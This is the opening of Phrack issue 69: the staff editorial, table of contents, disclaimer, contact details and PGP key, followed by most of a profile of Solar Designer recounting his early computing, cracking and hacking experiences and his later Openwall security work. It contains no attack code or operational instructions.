                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x01 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Introduction ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------=[ by the Phrack staff ]=------------------------=|
|=-----------------------=[ staff@phrack.org ]=--------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  May 6, 2016  ]=---------------------------=|
|=-----------------------------------------------------------------------=|

               ... A long time ago in a galaxy far far away ...

                     ______ _                    _
                     | ___ \ |                  | |
                     | |_/ / |__  _ __ __ _  ___| | __
                     |  __/| '_ \| '__/ _` |/ __| |/ /
                     | |   | | | | | | (_| | (__|   <
                     \_|   |_| |_|_|  \__,_|\___|_|\_\


                            _  _    ____  _____
                          _| || |_ / ___||  _  |
                         |_  __  _/ /___ | |_| |
                          _| || |_| ___ \\____ |
                         |_  __  _| \_/ |.___/ /
                           |_||_| \_____/\____/




--[ Introduction

Hello Phrack readers! It has been a long time, hasn't it? Aren't you
relieved that the world didn't end in 2012?! What if the Mayans were right?
What if comets hit Earth? Yes, we were worried too, so we decided to take
some time off and enjoy the last days of this planet. Once enough time had
passed, we were pretty sure our species was not going to disappear. It was
about time we returned to our blinking terminals again and finish what we
started :>

Um... yeah, that's the reason the last Phrack release was back in 2012...
Um... Kind of...

Damn, it took so long that even a Star Wars sequel was shot in the
meantime!

Anywayz, the Phrack Staff is back again, with a slightly different
editorial, bringing you an awesome collection of articles from several
respected hackers and other thinkers. No, we are not going to write a
Prophile on our new team. Yes, there are still people who prefer Phrack
over media whoring. The world is full of surprises. It took quite some
time, but we hope this issue of Phrack will meet your expectations.

One new addition to Phrack is the "Paper Feed" feature. The way it works is
that you submit a paper, we review it and it gets published. No need to
wait a month (or two years ;-) until you see your article in the next
Phrack issue. When the time has come, we'll decide to compile a new issue
from the articles that have been submitted. The usual rules do however
still apply: we are proud of being one of the longest-running magazines and
we're especially proud of presenting quality content to our readers (yes,
that's you). Papers submitted to the paper feed are no exception!

Phrack #69 brings you three new technical articles in addition to paper
feed and the standard Linenoise, Loopback and International Scenes philes.
The Firefox hater code-named argp presents advanced exploitation techniques
and attempts to build abstract primitives for taking advantage of various
memory-related vulnerabilities on your "favorite" multi-heap browser ;>
Huku, some guy who, obviously, visits porn sites a lot, has written an art
of exploitation phile focusing on Adobe Flash Player (hey, this is not
P0 man!). Last but not least, uty presents a VT-x based technique for
installing inline hooks and backdooring a whole system. We have spent much
time debugging this, we hope you *do* like it.

This release also comes with an excellent prophile on Solar Designer, a
person we all respect for his knowledge, attitude and contributions. We
were initially hesitant to contact him (yeah this guy has a damn busy
schedule), but it turned out that Solar was positive about being
prophiled. We believe this prophile will inspire a lot of people in the
scene - it's undoubtedly one of the best prophiles ever published in Phrack
and a great honor for all readers.

Enjoy maafakaz!


--[ Dark thoughts about the future

As we mentioned above, you have probably noticed a big change in the way
Phrack papers are released. We have decided to also have a paper feed mode
in addition to periodic releases, where each submitted work, that meets the
requirements, is released as soon as it has undergone proper reviewing. We
understand that this may not be as cool as releasing an issue at once, but
it was a necessary choice we had to make to avoid having Phrack fade out of
existence. The hope with this, is that now all you crazy world traveling,
conference speaking rockstars may have a medium for releasing a deeper dive
into the technology that you are presenting, and we can publish this at
the exact moment you are on stage. Personally, we would much prefer this
than trying to extract it ourselves from your pretty slide decks.

I guess we are all responsible for this. The community as a whole. The
hackers, the phreakers and all those tech perverts out there who have
stopped supporting Phrack. Trust me you would be disappointed if you had a
look at our inbox... or maybe no one uses ANTISPAM anymore? :>

For all you hackers out there thinking "I don't have a large project
ready for paper generation", consider writing something for Linenoise. 
Linenoise submissions take between a few hours and one day. As a community 
everyone has some small technique or cool trick that can save other people 
time, Linenoise offers an easy place to share these.

In this issue you will find a very interesting article titled "The Fall of
Hacker Groups". Take some time to read it through and wonder why the fuck
did we get here. The state of mind of the community seems to be changing
dramatically - what have you done to prevent hacking from practically
disappearing?

Quoting Phrack #63:

    "As long as there are hackers, there will be PHRACK magazine."

Now take some time, read this issue carefully, and notice the "as long as"
part in the previous sentence :>


--[ Table of contents

  0x01  Introduction ........................................ Phrack Staff

  0x02  Phrack Prophile on Solar Designer ................... Phrack Staff

  0x03  Phrack World News ................................... Phrack Staff

  0x04  Linenoise ........................................... various

  0x05  Loopback ............................................ Phrack Staff

  0x06  The Fall of Hacker Groups ........................... strauss

  0x07  Revisiting Mac OS X Kernel Rootkits ................. fG!

  0x08  Adobe Shockwave:
        A case study on memory disclosure ................... Aaron Portnoy

  0x09  Modern Objective-C Exploitation Techniques .......... nemo

  0x0a  Self-patching Microsoft XML with misalignments
        and factorials ...................................... Alisa Esage

  0x0b  Internet Voting: A Requiem for the Dream ............ kerrnel

  0x0c  Attacking Ruby on Rails Applications ................ joernchen

  0x0d  Obituary for an Adobe Flash Player bug .............. huku

  0x0e  OR'LYEH? The Shadow over Firefox .................... argp

  0x0f  How to hide a hook: A hypervisor for rootkits ....... uty & saman

  0x10  International Scenes ................................ various


--[ Greetings & thanks

For this issue we have a long list of people we would like to thank. This
issue wouldn't be complete had it not been for their support.

  * strauss       : Straus.. staruss... strsauss.. whatever man!
  * fG!           : The legendary white hat(ed) hero!
  * Aaron Portnoy : Real name detected!
  * nemo          : That lolcat you see in various memes ;-)
  * Alisa Esage   : Knows how to write exploits and doesn't work for P0
  * kerrnel       : What's with the extra "r"?
  * joernchen     : Ruby two-handed fapper
  * argp          : Hardcore Shakira fan - Favorite song "Heaps don't lie"
  * huku          : Casual youporn uploader
  * sysk          : Proud yolo Phrack supporter
  * uty & saman   : Makefiles suck!
  * solardiz      : Awesomeness prophiled
  * fjserna       : Guest reviewer of, well, you can figure out what
  * anonymous     : You know who you are, thanks for you support!

Last but not least, Phrack Staff is indebted to <redacted> *wink *wink*
for his support all these years. You have our respect for everything you
have offered to this magazine. We are now in different teams, but we will
always be glad to have some beers with you and talk about dirty hacks ;>
See you soon man!

Phrack is back! Prepare your arse for a new awesome release of your
favorite zine.


--[ Phrack policy

phrack:~# head -77 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */


                      ----( Contact )----

       <  Editors           : staff[at]phrack{dot}org   >
       >  Submissions       : staff[at]phrack{dot}org   <
       <  Commentary        : loopback[@]phrack{dot}org >
       >  Phrack World News : pwned[at]phrack{dot}org   <


    Submissions may be encrypted with the following PGP key:
    (Hint #1: Always use the PGP key from the latest issue)
    (Hint #2: ANTISPAM or it didn't happen)


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PHRACK

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
=cK7U
-----END PGP PUBLIC KEY BLOCK-----

|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x02 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[   Solar Designer   ]=-----------------------=|
|=-----------------------------------------------------------------------=|

|=---=[ Specifications

          Handle: Solar Designer
             AKA: solardiz.  Also, I used to hide under my real name.
   Handle origin: A turn-based game played over FidoNet (which IIRC I
                  played just once, but it took a while), and demoscene.
                  In 1994, I needed a handle to register on "private"
                  BBSes where real names were discouraged.  I chose this
                  one without giving it much thought, and it has stuck.
Age of your body: Older than Pushkin
 Height & weight: Quite some & not much
     Produced in: USSR
            Urlz: http://www.openwall.com/phrack
                  I imagine it will be gone when a historian reads this
                  many centuries later.
       Computers: B3-21, MK-52, (no longer have my EC-1841), 386DX40+387,
                  2x MicroVAX 3100-80, 2x Sun Ultra 5/10, Alpha 164SX (and
                  I had a 21066-based Multia for a year before), HP 712/80,
                  development boards (ZedBoard + Epiphany FMC, many ZTEX
                  FPGA boards waiting for their use), routers, etc. (the
                  EdgeRouter Lite is MIPS64, runs FreeBSD, and is used for
                  general development, so surely qualifies as a computer?)
                  HP200LX, Nokia Communicator series (9110, 9300, N900).
                  Lots of semi-ancient x86 (e.g., dual Pentium 3, RIMMs)
                  and many x86-64 (some laptops, etc.), some of which are
                  frankly what I actually use these days.  Some GPUs and
                  Xeon Phi in boxes we've setup for the larger community.
      Creator of: I'm the original author of most of the individual pieces
                  of software released under Openwall, including John the
                  Ripper password cracker and Linux 2.0.x to 2.4.x -ow
                  security hardening patches (now historical).  Openwall
                  GNU/*/Linux distro, with a team.  More recently yescrypt,
                  with 1.0 release planned in 2016.  Assorted programs for
                  DOS in a previous life, including (but not limited to)
                  "software protection" and cracks.
       Member of: Back in 1990s: BPC, uCF; I also participated in w00w00.
        Admin of: Openwall.  We host some moderated mailing lists, etc. -
                  including e.g. oss-security and kernel-hardening, and
                  also including the private distros list (which sort of
                  replaced vendor-sec and those predating it, and which I
                  always have mixed feelings about).  That's already-public
                  info, and it has to be such, so no OPSEC fail here.
        Projects: Most of those currently active at Openwall.
           Codez: You mean stuff that is of more hack and historical value
                  than of direct use?  I am often reminded of those first
                  ret2libc exploits I sent to Bugtraq in 1997.  I'll
                  mention a few more further in this prophile.
    Active since: 1994?  I was not into "the scene" before.
  Inactive since: 1997?  I no longer release under a group since then, so
                  maybe not on the scene either?  Besides, we got a
                  CFAA-alike in Russia since 1997, limiting the playground.
                  That said, I was doing computer stuff before 1994, and I
                  still am now.

|=---=[ Favorites

   Actors: Not really.  I think screenplay matters more.  I recognize some
           screenwriters and directors like Gilliam and Zemeckis.  Oh,
           actually, let me agree with PaX Team's answer here - Chaplin -
           as this is consistent with what I just said.
    Films: I can't pick just a few favorites, but I was relieved to find
           out that The Shawshank Redemption ranks so high on IMDB.  Maybe
           the humanity has hope (or at least IMDB reviewers do).
  Authors: I really would rather not name just a few, or I'd later regret.
           (I already almost regret mentioning just some directors above.)
 Meetings: What's meant to go into this field?  Where to meet?
           Restaurants, cafes, bars without loud music (unless
           intentionally attending a live performance).  I'd also consider
           meeting at a hackerspace.  I rarely meet people in person,
           though.  To compensate for that, I really like it how there are
           now two practical ("non-paper") computer security cons in Moscow
           per year - PHDays in May and ZeroNights in November - with
           mostly the local crowd, but always also some foreign speakers
           and attendees.
      Sex: What's the right answer?  Something like y?(+++++++)?
    Books: I'd say encyclopedia.  Now that would be Wikipedia.
    Novel: Sadly, I am not reading much.  If I were, I would probably not
           be able to single out just a few titles.  As a kid, I read War
           and Peace, and I liked it.  (I hear it was also taught in Soviet
           schools, but luckily I skipped that and read it on my own will.)
           More relevant to Phrack readers, I also recall I liked reading
           (in 1990s) Stephen King's The Dead Zone and John Varley's Press
           Enter (OK, that one is too short for a novel, and I had to look
           up who wrote it to refer to it now, but I did in fact like it).
  Meeting: HAL2001 stands out because it was a first for me, and I liked
           its atmosphere and extent.
    Music: There are few genres that I don't recall ever enjoying listening
           to, but I tend to especially like rock, jazz, bossa nova.
  Alcohol: Dark beer
     Cars: No favorite, and not my thing, but some do look stylish to me or
           have a history or fiction attached to them (such as the
           DeLorean, which apparently wasn't that good a car otherwise).
           I also value the designers' achievements.  At a local retro
           sports car exhibition last year, it was interesting for me to
           see how greatly the horsepower per cc and torque per cc improved
           over the years, and how a few custom engines stood out.  It's an
           optimization problem not entirely unlike what we have in
           computing and communications, where some designs were also
           "ahead of their time".
    Girls: Not between Cars and Food
     Food: Italian is usually a safe bet
   I like: All sorts of freedom (as long as it doesn't infringe on someone
           else's), free time, good people, nature, (im)perfection
I dislike: Simply inverting the "I like" above would be bad enough as it is
           (except that (im)perfection is its own inverse).
           I'd rather not provide even worse (or better, from adversary's
           POV) hints than that.  Oh, I'll add just one: filling out guinea
           pig forms like this... but who am I to break the tradition?

|=---=[ Life in 3 sentences

Way too little achieved in this much time.  I could do a lot more, but if I
act unnaturally would that still be me?  (Rhetorical.)

|=---=[ Passions, what makes you tick

Curiosity and self-defined challenges (especially if unannounced so they
don't become a drag) combined with whatever else I like.

|=---=[ Memorable experiences

You suggest some questions along the lines of "how did you start?" to be
answered for your readers further in my prophile, so I'll turn this section
into a background story for answering those.  It got rather long (and
off-topic?), so your readers should feel free to skip to the next section
and maybe revisit this one later.  Here we go, with some recalled or maybe
just made up computer and electronics related experiences from 1980s and
1990s roughly in chronological order:

Nearly winning a Darwin award as a kid.  Before I got access to computers,
I was having fun with electrical circuits, and some of those experiments
were not well-suited for a kid nor always conducted with appropriate
precautions.  Luckily, this only made me stranger.  When I was 8, I learned
the hard way that you don't test a hypothesis by assuming it's true and
just letting things go wrong if you're wrong, if "wrong" can mean it'd be
the last thing you'd realize.  If you feel you need to test, you recognize
there's a chance you are (or something is) wrong.  It's just like how you
shouldn't test whether your restarted sshd still works by first logging out
and then trying to log back in - something I still see adults do,
presumably because they were not that close to be Darwin winners as kids.

Playing with Soviet cable radio during a few of the "technical breaks"
(when normal broadcast stopped).  Listening to foreign shortwave stations
(DXing?), including through the jamming (was more tolerable out of town).

Finding near the garbage cans a cabinet drawer with tools (including a
soldering iron), electronic parts, and all 12 of the Soviet "Radio"
magazine issues from 1966.  I guess someone had passed away, someone who
ended up having some influence on me.  (Later I actually built and briefly
tested an 80 meter band transmitter described in one of those issues, based
on two vacuum tubes, but I never got into ham radio.)

Fast arbitrary precision division (typically 5 digits per iteration),
writing down some 100+ digit periodic sequences, which felt like magic
(will this thing repeat after N-1 digits again? oh yes it does), on a
non-programmable 8-digit calculator.  I came up with the algorithm on my
own.  I didn't know the word "algorithm" back then, nor programming.

Exploring and eventually programming my father's B3-21, with great fun.

Getting some written-off Soviet mainframe boards with K155 series TTL chips
on them (equivalent to 74 series), mostly K155LA3 (7400).  Luckily, a book
on those just happened to arrive to a nearby bookstore, so I started
building my own logic circuits.  I recall craving for more K155TM2's (7474,
dual D flip-flops), which were lacking.  I ended up desoldering a K155TM2
from an expensive toy, which I was done playing with, to build my own toys
with the flip-flops.  In general, almost all of the electronic parts I was
building circuits from had been previously used.  You couldn't just go to a
store and buy parts that you needed when you needed them.  For example, I
didn't have enough LEDs, so I used transistors and bulbs to indicate logic
levels like if it were 1960s or 70s.

Since 1989 or so, having sporadic time-limited access to BK-0010 and a
variety of x86 ranging from different PC/XT clones (with green phosphor
CGA and Hercules monitors) to early 386+287 (with early vendor-specific
SVGA) and then even the super fast & pricey 386+387 33 MHz.  (I think 486s
were still subject to CoCom export regulation.)  There was also a Japanese
24 pin dot matrix printer capable of up to 360 dpi, with a decent user's
manual on its escape sequences, so I actually printed graphics in 360 dpi
on it, multi-pass and very slow of course.  My own vector font, too,
created in my own font editor.  Not having much time to debug code on the
actual machines, I initially wrote programs on paper and debugged them
mentally, then typed them in and they had to work right with only minor
changes needed.  (This skill later proved especially helpful for firmware
modification, as well as for exploits.)

It's during this period that I learned 16-bit x86 asm through reading some
books and a printout of the disassembly of KILL.COM, a ~4 KB DOS TSR
program that allowed a user to forcibly kill the currently active program
and return to DOS, with both this tool and the Sourcer disassembler having
been given to me by a friend on a floppy.  Other languages explored
included: BASIC dialects; Fortran for bringing programs (that my father was
using for work) from mainframes to PC; Turbo Pascal, which worked the
smoothest, but couldn't use 386's protected mode yet (unlike one of the
Fortran compilers, which could).  (A bit later, I wrote a Fortran 66 to
Pascal source level translator that would reconstruct program structure
from all those labels.  Many years later, I migrated some of those Pascal
programs to Linux/Alpha, building them with GNU Pascal, mostly for fun.)
I also briefly started with C in 1990 or so, but soon abandoned it because
of inefficient static linking under DOS (too much dead code).

Back then, and in DOS, the command-line felt like it was being obsoleted by
tools such as Norton Commander (and then its many clones) and Borland's or
Microsoft's recently introduced IDEs for their compilers, but somehow not
for the assemblers, nor for Fortran.  By 1992, I had an own IDE developed
for DOS (yes, first written on paper, piece after piece, and then typed in
during those occasional computer sessions), which had its own text editor
(as well as bells and whistles such as a calculator - but no, exploits
didn't pop it up) and it was capable of running the CLI compilers with
their output captured via INT 10 intercept and analyzed, so it would place
the cursor right at the error line, just like those vendors' IDEs did.  Of
course, it could also run the just-compiled program... and it could kill
it, too.  Somehow I felt this was important enough for me to have bothered
with all this effort (or maybe it was just about the challenge, as usual).
Over a few years, I also worked on other TUIs and GUIs for various programs
(ranging from 320x200 CGA to weird VGA ModeX resolutions and to 1024x768
SVGA under DOS, with my own drivers and my port of Borland's Turbo Vision
from text to graphics modes).  (It's only after I discovered Unix that I
realized I am perfectly comfortable using a compiler from the command-line,
and don't really need IDEs.  These days, I am not using any IDE.  Maybe I
also moved to developing different kinds of software, where IDEs are less
helpful.  I don't oppose to using an IDE again for a right project.)

MK-52 with its whopping 512 bytes of EEPROM on top of these calculators'
tiny program and data memories.  Yeggogology, where you explore the
undocumented world of the calculator trying not to hit the darkness (you
have to power-cycle when you do).

Together with my father, buying our first home computer, the Soviet PC/XT
software compatible EC-1841, from its previous owner, for a full bag of
Soviet 5 ruble banknotes weighing a few kilograms.  IIRC, my father got
those earlier the same day as a withdrawal of a very recent payment (so not
yet eaten up by the inflation), which came for a project I contributed to
as well.  Somehow the bank only had sealed packs of 5 ruble bills.

"Snow" on CGA screens, and suppressing it, or choosing not to - for speed.

Low-level formatting a brand new unformatted 20 MB MFM hard drive (ST-225),
for a neighbor's EC-1845, with a program I wrote for this one occasion (OK,
I cheated - used BIOS calls - but not a do-it-all routine, which I was not
aware of and might not have had in my BIOS).  Tuning the interleaving, too.

In 1993, already on a 386 at home, cracking a key floppy protected program,
using nothing but DOS debug, paper and pencil, many reboots and patience.
Since then and until 1996, I went into both cracking and creating "software
protection" systems - initially naive, then smarter, and eventually moving
from simple code encryption and anti-debugging tricks (eventually confusing
non-patched SoftICE alright through inconsistent opcode and ModR/M byte
combinations, handling those on INT 6) to use of VMs (NOR CPU, reinventing
OISC as I realize now).

A couple of years later, a brief encounter into creating key floppies for
software protection, with arbitrarily-numbered different-size sectors on a
track and some decoys.  A Win16 DLL, written in asm and using Win16/DPMI/
BIOS calls, to check this floppy.  BIOS actually allowed for a lot of
flexibility through temporarily patching the diskette parameter table from
a critical section.  Of course, this was easily crackable in software, but
that was OK for the given project.

Game programming, on all devices ranging from the calculators (for
turn-based games, as the only way to provide input without interrupting the
program was via the radian-degree switch) to computers.  Reuse of ChiWriter
printer fonts for good-looking large captions on screen.  Playing some
computer games too.  Eventually own multi-window graphics/sprite editor,
own adventure game engine (both recently reused in DOSBox for my ZeroNights
2014 keynote game, and as a toy for my son, who ended up adding so many
sprites to his game that he triggered a stack overflow in the game engine).

Getting on BBSes via a 2400 bps modem in 1993.

Getting on the Internet and on Unix in 1994 - and revisiting C programming.
FTP sites, Archie.  Then early web sites, AltaVista.  X.25 PADs, mostly as
a means to get to a system that would have Internet.  Linux kernel 1.2.3 on
my 386.  Playing mouse to retain Internet access and development access to
non-x86 boxes, and getting a bit carried away.  Back then, I didn't quite
realize I was merely playing mouse, with cats out there.  I also didn't
realize not all other players treated this as a game.  I did have other
ways to get online, such as when physically visiting places that had
Internet access, as well as by using single-line dialups that friends set
up in such places, but I couldn't reasonably use them as much as I wanted
to and they were not part of the game.

Implementing DES in assembly for 32-bit SPARC to use double-register load
and store instructions (thus, 64-bit), which the C compiler somehow
wouldn't use.  The fun part was debugging this on x86, as I didn't have a
SPARC at home yet and didn't want to do it all online, so I wrote a partial
SPARC to x86 assembly source level translator to let me get the computation
right before testing and optimizing on a remote Sun machine.  (Later I also
wrote similar DES code in assembly for Alpha, but debugged it on the real
thing right away.)

Longwave (a few hundred KHz carrier) radio transmission experiment from my
resistor-based Covox on the 386's printer port.  I could pick up Led
Zeppelin's Immigrant Song, which I had digitized from an audio cassette at
6-bit 20 kHz mono via a two-transistor comparator on the same Covox and was
now transmitting, on a commodity receiver from a few meters away.  So I
totally reinvented software-defined radio on my own, having no idea it was
already a thing (Wikipedia says so).  Now this could be called an airgap
bypass PoC (or not, since the receiver wasn't a computer), but I didn't
think in such terms back then.  (And yes, I didn't have a real soundcard.)

Audio playback via floppy drive motors (2 signal levels: low on 3.5", high
also on 5.25").  Yes, Immigrant Song again.  It's only recently that I
learned others did this too (there are videos on YouTube), albeit
apparently without the 2-level separation (and instead with multiple
channels) and for sheet music rather than for arbitrary audio recordings.

A brief experiment with blueboxing using the same Covox, with little luck:
the line responded to 2600+2400, but seemingly ignored other CCITT #5
signals.  (Apparently, blueboxing with different signaling worked on
ex-USSR lines, but usually wasn't completely free, and I never tried to get
into it.  Arbitrary dual-tone capability was even included in the Russian
Courier modems, which were different hacks of USR modems.)

USR Courier modem firmware hacking: I put a debugger with disassembler and
breakpoint support right in there, available via added AT commands, just
for fun.  (How do you implement breakpoints when the code is in EEPROM and
the CPU lacks hardware breakpoint support?  By keeping the CPU in
single-step mode while there's a breakpoint set!  Is it still fast enough
for the modem to work, then?  Turns out that for the supervisor CPU, not
the DSP, the answer is yes, although the lag is barely bearable.)

The disassembler I wrote had only 164 bytes of native code (could it be the
smallest disassembler ever written for a complete CISC ISA?), with the rest
(over 2 KB) being data: a special-purpose data structure with arbitrary bit
patterns to match and strings to print, and cross-references for reuse of
common patterns and substrings across instruction groups.  Is this possibly
interpreted code in a domain-specific language rather than data?  "What's
the difference?"  (WOPR's answer in WarGames, could be about code vs. data)

Making mostly non-impressive intros, probably not my thing.  I might have
contributed to the smallest categories appearing (128-byte initially) by
advocating this in a Russian FidoNet group where the first such competition
was then carried out (and where my entry shared second place with another
participant's), with other competitions in these sizes appearing
internationally shortly thereafter (as the 20 intros from the first Russian
competition were uploaded to foreign sites).

Winning a contest for smallest "mkdir -p" implementation for DOS, with a 20
bytes entry: BA 82 00 5F B8 5C 39 31 05 47 AE 75 FD 4F 31 05 CD 21 EB F0.
How does this program terminate cleanly?  Self-modifying code, and moreover
letting the program XOR over itself.  (The contest rules were weird: only
documented DOS features and startup register values, yet OK to require
trailing backslash.  19 bytes was demonstrated possible, and less than that
might be, with reliance on undocumented startup register values.)

Being wrong yet over-confident or/and elitist on some occasions - luckily
not many (that I recall).  Not good of me.

In 1997, joining an ISP (by demonstrating a vulnerability, of course) and
starting to play cat to keep mice under control (but not hurt), as well as
not needing to play mouse myself anymore.  A tiny unreleased exfiltration
detector I wrote at the time was called Tom.  There was also, in modern
terms, a metadata analysis tool for traffic to one of the first social
networks - ICQ, which was extremely popular among Windows users here - to
keep track of abusers on dialup lines despite changing accounts, and even
be alerted when a friend-of-abuser shows up.  That tool I never let
anyone else use, and never released, for ethical reasons.  (Of course, I
was "entitled" to use it, right?..  Oh, excuses.)

On a related note, caller IDs were very common at homes in Russia, starting
to appear in early 1990s.  These were based on inexpensive telephones with
most of their original contents thrown out and replaced by a board with a
Soviet clone of 8080 or with an imported Z80 CPU.  They reused in-band
signaling initially intended for use by long-distance exchanges (with the
caller's line disconnected for a moment with a relay at their local phone
exchange, to prevent spoofing), but technically also available to the
called party on local calls (and easily audible and tamperable with by the
caller, since the long distance call's anti-spoofing relay wasn't
triggered).  Despite of their popularity at homes, they were almost never
used on dialup lines.  Similarly, while some late modem firmware hacks
included caller ID functionality for ex-USSR, those were targeted at
consumers (including e.g. FidoNet nodes) rather than ISPs.  It's only with
the move of dialup lines to digital interfaces (E1) reaching into the ISPs
in late 1990s to early 2000s that caller numbers commonly started to appear
in TACACS+ or RADIUS server logs at ISPs.  Until then, it was cheaper to
extract and selectively log ICQ UINs.

Also in 1997, posting a rough non-executable user stack patch for the Linux
kernel to LKML while running it on my very computer, and being told that it
can't work (because signal handlers, which I had already worked around in
the patch I posted, and gcc trampolines, which I had not encountered yet
due to libc5 rather than early glibc).

The ISP's chief sysadmin's reaction when I casually mentioned that my Linux
kernel patch we were about to install on the servers had just started to
use ring 2, in addition to 0 and 3.  (We did install, and it worked great.)

Apparently, forgetting my childhood Darwin lessons and letting a coworker
at the ISP flash my modified firmware (fixing a connection stability
issue) into all 16 of the modems in a Total Control unit without
power-cycling it after the first flash... and getting the checksum wrong.
Oops.  (The modems then worked fine until power-cycle.)  Luckily, recovery
was as easy as for the individual Courier modems, so not a big deal, but it
did cost some downtime for those 16 lines (there were many more already).

Tweaking L2 cache timings of the dying Multia to prolong its life, having
read up on 21066's "internal processor registers".  Then returning it to
its owner and buying 164SX+21164PC of my own in 1998, and tweaking L2 cache
timings via 21164PC's different IPRs the other way for speed (years later,
my tweaks would turn out to reliably result in a specific miscompile when
building our Linux distro, Owl - oops).  Tweaking a Modeline for 2000x1500
on a 21" CRT (worked, but was painful to look at because of low refresh
rate; I actually used 1600x1200).  In general, tweaking lots of things.

Finally playing with VMS on VAX a little bit (and VT420's, with yellow
phosphor for a change), including e.g. mounting a filesystem from tape -
something normally not possible on Unix where tape drives are character
devices.  DECnet between Linux and VMS.

This brings us almost to 2000s.  I'll cover some of the newer stuff below.

|=---=[ Quotes

I have no favorites, but I find these relevant:

"Is this a game or is it real?"  (WarGames)

"If you shame attack research, you misjudge its contribution.  Offense and
defense aren't peers.  Defense is offense's child."  (John Lambert)

